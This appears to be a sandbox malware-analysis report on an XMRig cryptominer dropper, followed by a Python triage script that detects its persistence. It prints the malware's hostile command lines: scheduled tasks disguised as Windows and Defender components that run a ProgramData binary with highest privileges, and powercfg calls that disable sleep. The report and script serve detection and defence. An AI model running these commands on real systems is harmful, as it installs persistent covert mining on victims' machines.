
Windows Analysis Report
FixDefError.exe

Overview

General Information

Sample Name: FixDefError.exe
Analysis ID: 829697
MD5: 1b664f2a0bede6c47e44ca8c0aad3de7
SHA1: 2dc3169220411d03be438047a3c33696b4371d2b
SHA256: 908641c2c756b0a2762e4883f7defb050e1baa09d44be8cdad34c5aa562d65d9
Tags: exe

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Modifies power options to not sleep / hibernate
Found strings related to Crypto-Mining
Modifies the hosts file
Encrypted powershell cmdline option found
Sample is not signed and drops a device driver
Uses the Telegram API (likely for C&C communication)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
May check the online IP address of the machine
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Uses powercfg.exe to modify the power settings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Creates driver files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • FixDefError.exe (PID: 5872 cmdline: C:\Users\user\Desktop\FixDefError.exe MD5: 1B664F2A0BEDE6C47E44CA8C0AAD3DE7)
    • ProgramStarter.exe (PID: 5928 cmdline: "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe" MD5: 0326F45523014399DEA91452C957B5E0)
      • cmd.exe (PID: 6128 cmdline: cmd.exe" /C powershell -EncodedCommand "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 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5228 cmdline: powershell -EncodedCommand "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" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • cmd.exe (PID: 3196 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 4900 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 4092 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2220 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 4844 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5268 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 4560 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5296 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 1964 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2956 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5272 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2820 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5396 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5528 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 2156 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5584 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5552 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5564 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5624 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5724 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5676 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5736 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5700 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6052 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5636 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5312 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5608 cmdline: "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powercfg.exe (PID: 5292 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: FA313DB034098C26069DBADD6178DEB3)
        • powercfg.exe (PID: 3776 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: FA313DB034098C26069DBADD6178DEB3)
        • powercfg.exe (PID: 4604 cmdline: powercfg /x -standby-timeout-ac 0 MD5: FA313DB034098C26069DBADD6178DEB3)
          • Conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powercfg.exe (PID: 4940 cmdline: powercfg /x -standby-timeout-dc 0 MD5: FA313DB034098C26069DBADD6178DEB3)
        • powercfg.exe (PID: 5652 cmdline: powercfg /hibernate off MD5: FA313DB034098C26069DBADD6178DEB3)
        • schtasks.exe (PID: 4688 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 6112 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2764 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5700 cmdline: "cmd.exe" /c chcp 1251 & C:\ProgramData\RuntimeBrokerData\svhost.exe -c config.json MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • chcp.com (PID: 4092 cmdline: chcp 1251 MD5: 561054CF9C4B2897E80D7E7D9027FED9)
  • svchost.exe (PID: 4932 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5684 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 160 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • RegSvc.exe (PID: 5524 cmdline: C:\ProgramData\RuntimeBrokerData\RegSvc.exe MD5: BFD02E7E401667B6C5853FE0FBEC26E7)
  • svchost.exe (PID: 3920 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5284 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1276 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1112 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5724 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
Yara matches (Source | Rule | Description | Author), matched strings listed under each entry:

sslproxydump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
sslproxydump.pcap | Linux_Trojan_Pornoasset_927f314f | unknown | unknown
  • 0x18b2d8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
sslproxydump.pcap | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x6aab33:$a1: mining.set_target
  • 0x69baba:$a2: XMRIG_HOSTNAME
  • 0x69e99e:$a3: Usage: xmrig [OPTIONS]
  • 0x69ba94:$a4: XMRIG_VERSION

C:\ProgramData\RuntimeBrokerData\svhost.exe | XMRIG_Monero_Miner | Detects Monero mining software | Florian Roth (Nextron Systems)
  • 0x66b5e8:$s1: 'h' hashrate, 'p' pause, 'r' resume
  • 0x61023e:$s2: --cpu-affinity
  • 0x610258:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
  • 0x60fb88:$s4: password for mining server
C:\ProgramData\RuntimeBrokerData\svhost.exe | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth (Nextron Systems)
  • 0x66b108:$x1: donate.ssl.xmrig.com
  • 0x66b5d9:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
  • 0x6fc723:$s2: \\?\pipe\uv\%p-%lu
C:\ProgramData\RuntimeBrokerData\svhost.exe | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
C:\ProgramData\RuntimeBrokerData\svhost.exe | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
  • 0x66c788:$s1: %s/%s (Windows NT %lu.%lu
  • 0x670e08:$s3: \\.\WinRing0_
  • 0x611b42:$s4: pool_wallet
  • 0x60c170:$s5: cryptonight
  • 0x60c17e:$s5: cryptonight
  • 0x60c18d:$s5: cryptonight
  • 0x60c19b:$s5: cryptonight
  • 0x60c1b0:$s5: cryptonight
  • 0x60c1bf:$s5: cryptonight
  • 0x60c1cd:$s5: cryptonight
  • 0x60c1e2:$s5: cryptonight
  • 0x60c1f1:$s5: cryptonight
  • 0x60c202:$s5: cryptonight
  • 0x60c219:$s5: cryptonight
  • 0x60c227:$s5: cryptonight
  • 0x60c235:$s5: cryptonight
  • 0x60c245:$s5: cryptonight
  • 0x60c257:$s5: cryptonight
  • 0x60c268:$s5: cryptonight
  • 0x60c278:$s5: cryptonight
  • 0x60c288:$s5: cryptonight
C:\ProgramData\RuntimeBrokerData\svhost.exe | Linux_Trojan_Pornoasset_927f314f | unknown | unknown
  • 0x140958:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48

00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp | Linux_Trojan_Pornoasset_927f314f | unknown | unknown
  • 0x50990:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, CommandLine: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe", ParentImage: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe, ParentProcessId: 5928, ParentProcessName: ProgramStarter.exe, ProcessCommandLine: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, ProcessId: 3196, ProcessName: cmd.exe

Snort alerts (timestamp | source -> destination | source port -> destination port | protocol | SID | classtype):
03/19/23-00:18:14.932574 | 192.168.2.3 -> 8.8.8.8 | 49977 -> 53 | UDP | SID 2036289 | A Network Trojan was detected
03/19/23-00:18:15.028582 | 192.168.2.3 -> 95.179.241.203 | 49697 -> 443 | TCP | SID 2831812 | A Network Trojan was detected
03/19/23-00:18:02.289189 | 192.168.2.3 -> 95.179.241.203 | 49696 -> 443 | TCP | SID 2831812 | A Network Trojan was detected
03/19/23-00:18:02.189431 | 192.168.2.3 -> 8.8.8.8 | 62704 -> 53 | UDP | SID 2036289 | A Network Trojan was detected
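The persistence pattern in this report is a dozen schtasks entries, all pointing at one binary under C:\ProgramData, named after real Windows and Defender components and run with /RL HIGHEST, plus powercfg calls that stop the host from sleeping so the miner keeps running. The following script, an added example that is not part of the Joe Sandbox report, triages process-creation command lines for exactly that pattern. The sample lines are constructed from the report's process tree (the final "VendorUpdate" line is a constructed benign control, not from the report), and the path list, lookalike-name list and tag wording are the author's choices.

```python
"""Flag schtasks/powercfg persistence in process-creation command lines.

Added example for this report, not Joe Sandbox code. SAMPLE_CMDLINES is
constructed from the report's process tree; the last entry is a benign
control that is not in the report."""
import re

SAMPLE_CMDLINES = [
    'SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\\ProgramData\\RuntimeBrokerData\\RuntimeBroker.exe" /RL HIGHEST /f',
    'SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\\ProgramData\\RuntimeBrokerData\\RegSvc.exe" /f',
    'SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\\Agent Activation RuntimeServices_bk903" /TR "C:\\ProgramData\\RuntimeBrokerData\\RuntimeBroker.exe" /RL HIGHEST /f',
    'powercfg /x -standby-timeout-ac 0',
    'powercfg /hibernate off',
    'SCHTASKS /CREATE /SC DAILY /TN "VendorUpdate" /TR "C:\\Program Files\\Vendor\\update.exe" /f',  # benign control (constructed)
]

# cmd.exe-style tokenizer: a double-quoted run is one token, quotes dropped.
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')

# Locations a standard user can write to; a task action living there is a red flag.
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "\\appdata\\", "c:\\windows\\temp\\")

# Component names the sample borrowed for its task names (taken from the report's process tree).
LOOKALIKE_NAMES = ("securityhealthsystray", "windowsdefender", "wmiprvse",
                   "antimalwareserviceexecutable", "antimalwareserice", "runtimebroker",
                   "microsoftedgeupd", "onedriveservice", "nvstray", "microsoftupdateservices",
                   "settingsyshost", "agent activation runtime")

POWERCFG_SLEEP_OPTS = ("-standby-timeout-ac", "-standby-timeout-dc",
                       "-hibernate-timeout-ac", "-hibernate-timeout-dc")


def tokenize(cmdline):
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in TOKEN_RE.finditer(cmdline)]


def parse_schtasks(cmdline):
    """Return the /TN /TR /SC /MO /RL values of a 'schtasks /create' line, else None."""
    toks = tokenize(cmdline)
    if not toks or toks[0].lower() not in ("schtasks", "schtasks.exe"):
        return None
    lowered = [t.lower() for t in toks]
    if "/create" not in lowered:
        return None
    opts = {}
    for i, t in enumerate(lowered):
        if t in ("/tn", "/tr", "/sc", "/mo", "/rl") and i + 1 < len(toks):
            opts[t[1:]] = toks[i + 1]  # keep the value's original case
    return opts


def classify_schtasks(opts):
    """List the reasons a parsed schtasks /create command looks like malware persistence."""
    reasons = []
    action = opts.get("tr", "").lower()
    name = opts.get("tn", "").lower()
    if any(p in action for p in USER_WRITABLE):
        reasons.append("task action in user-writable path")
    if opts.get("rl", "").upper() == "HIGHEST":
        reasons.append("runs with highest privileges")
    if opts.get("sc", "").upper() in ("MINUTE", "HOURLY"):
        reasons.append("frequent re-launch (watchdog pattern)")
    if any(n in name for n in LOOKALIKE_NAMES):
        reasons.append("task name mimics a Windows component")
    return reasons


def classify_powercfg(cmdline):
    """Flag powercfg calls that disable sleep or hibernation (miner stays resident)."""
    toks = [t.lower() for t in tokenize(cmdline)]
    if not toks or toks[0] not in ("powercfg", "powercfg.exe"):
        return []
    if toks[1:3] == ["/hibernate", "off"]:
        return ["hibernation disabled"]
    if len(toks) >= 4 and toks[1] == "/x" and toks[2] in POWERCFG_SLEEP_OPTS and toks[3] == "0":
        return [f"{toks[2]} set to never"]
    return []


def triage(cmdlines):
    """One finding per suspicious command line, with the reasons it was flagged."""
    hits = []
    for line in cmdlines:
        opts = parse_schtasks(line)
        reasons = classify_schtasks(opts) if opts is not None else classify_powercfg(line)
        if reasons:
            hits.append({"cmdline": line, "task": opts.get("tn") if opts else None, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_CMDLINES):
        print(hit["task"] or hit["cmdline"], "->", "; ".join(hit["reasons"]))
```

The benign control is not flagged because its action lives under Program Files, it runs daily and it asks for no elevation; the report's tasks trip three or four checks each, which is the combination worth alerting on rather than any single schtasks call.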


AV Detection

Source: FixDefError.exe | ReversingLabs: Detection: 25%
Source: FixDefError.exe | Virustotal: Detection: 39%
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1203240
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Avira: detection malicious, Label: HEUR/AGEN.1236409
Source: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe | ReversingLabs: Detection: 79%
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe | ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | ReversingLabs: Detection: 30%
Source: FixDefError.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Joe Sandbox ML: detected

Bitcoin Miner

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED
Source: svhost.exe.1.dr | String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: svhost.exe.1.dr | String found in binary or memory: cryptonight/0
Source: svhost.exe.1.dr | String found in binary or memory: -o, --url=URL URL of mining server
Source: svhost.exe.1.dr | String found in binary or memory: stratum+tcp://
Source: svhost.exe.1.dr | String found in binary or memory: Usage: xmrig [OPTIONS]
Source: svhost.exe.1.dr | String found in binary or memory: XMRig 6.17.0
Source: unknown | HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49685 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.3:49686 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49687 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49688 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49689 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49690 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49692 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49695 version: TLS 1.2
Source: FixDefError.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ImpulseWatch.pdb | source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
Source: Binary string: ImpulseWatch.pdb|l | source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
Source: Binary string: ProgramInstaller.pdb | source: FixDefError.exe
Source: Binary string: Impulse.pdb | source: FixDefError.exe, 00000000.00000002.302610547.0000000005B07000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000000.249150208.0000000000752000.00000002.00000001.01000000.00000007.sdmp, ProgramStarter.exe.0.dr
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr
Source: Binary string: ImpulseClipper.pdb | source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000000.287793640.00000000001B2000.00000002.00000001.01000000.00000009.sdmp, RegSvc.exe.1.dr

